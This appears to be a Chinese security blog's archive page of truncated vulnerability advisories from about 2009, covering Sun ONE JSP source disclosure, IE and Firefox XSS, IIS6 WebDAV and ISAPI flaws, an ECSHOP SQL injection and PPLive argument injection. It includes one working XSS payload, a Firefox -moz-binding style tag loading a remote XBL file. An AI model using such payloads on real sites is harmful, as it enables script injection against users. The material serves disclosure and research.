# 鬼仔:在包子那里看到的。
原文链接
Web Application Vulnerability Scanners are tools designed to automatically scan web applications for potential vulnerabilities. These tools differ from general vulnerability assessment tools in that they do not perform a broad range of checks on a myriad of software and hardware. Instead, they perform other checks, such as potential field manipulation and cookie poisoning, which allows a more focused assessment of web applications by exposing vulnerabilities of which standard VA tools are unaware.
阅读全文 »
Tags: Application,
Scanner,
Vulnerability,
Web
作者:Kingcope Kingcope <kcope2_(at)_googlemail.com>
Sun One WebServer 6.1 JSP Source Viewing vulnerability
System: Sun-ONE-Web-Server/6.1, Windows Server 2003
SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose
JSP Source code.
阅读全文 »
Tags: Jsp,
Sun One WebServer,
Vulnerability
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt
Overview:
Tags[not include <IFRAME>] in ie7/8 are don’t allowe to run “javascript:[jscodz]”,but
we found them allowed ro run where open it in new target.
like this url:
阅读全文 »
Tags: IE7,
IE8,
Vulnerability,
XSS
作者: www.80vul.com
1. firefox2 css xss vulnerabilities
<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>
test.xml:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<bindingSpellE">xss">
<implementation>
<constructor><![CDATA[alert('XSS')]]></constructor>
</implementation>
</binding>
</bindings>
[PS:firefox3开始不允许-moz-binding:url引用远程文件]
阅读全文 »
Tags: QQ Mail,
Vulnerability,
XSS
####
# #####
#### # #####
####### ### ######
####### ###### #######
######### ####### ########
##################### #########
#### ######### ########## ####
#### ###### ####### ####
#### #### #### ####
#### # #####
######## ###### ######
阅读全文 »
Tags: Authentication Bypass,
IIS6,
Microsoft,
Vulnerability,
WebDAV
# 鬼仔:有同学在评论中提醒,这个是很老的了,去年十月国内就有人发过了,看了下,的确是,地址在这里。虽然是老的,但是以前没发过,所以也就不删了,留在这里存档吧。
######################### Securitylab.ir ########################
# Application Info:
# Name: ECSHOP
# Version: 2.5.0
# Website: http://www.ecshop.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
阅读全文 »
Tags: ECShop,
SQL Injection,
SQL注入,
Vulnerability,
漏洞
来源:80sec
function Copyright()
{
var Author=”80sec”;
var Email=”kEvin#80sec.com”.replace(”#”,”@”)
var Site=”http://www.80sec.com”;
var Date=new Date(2009,4,24).toLocaleString();
var Reference=”http://www.80sec.com/Microsoft-Internet-Infomation-Server-6-ISAPI-filename-analytic-Vulnerabilitie.html”;
return Reference;
}
/*
漏洞描述:
阅读全文 »
Tags: IIS,
IIS6,
ISAPI,
Microsoft,
Vulnerability
——————————————————————————–
PPLive <= 1.9.21 uri handlers “/LoadModule” remote argument injection
by Nine:Situations:Group::strawdog
——————————————————————————–
software site:http://www.pplive.com/en/index.html
our site: http://retrogod.altervista.org/
software description:
“PPLive is a peer-to-peer streaming video network created in Huazhong University of Science and Technology, People’s Republic of China. It is part of a new generation of P2P applications, that combine P2P and Internet TV, called P2PTV.”
阅读全文 »
Tags: Exploit,
PPlive,
Vulnerability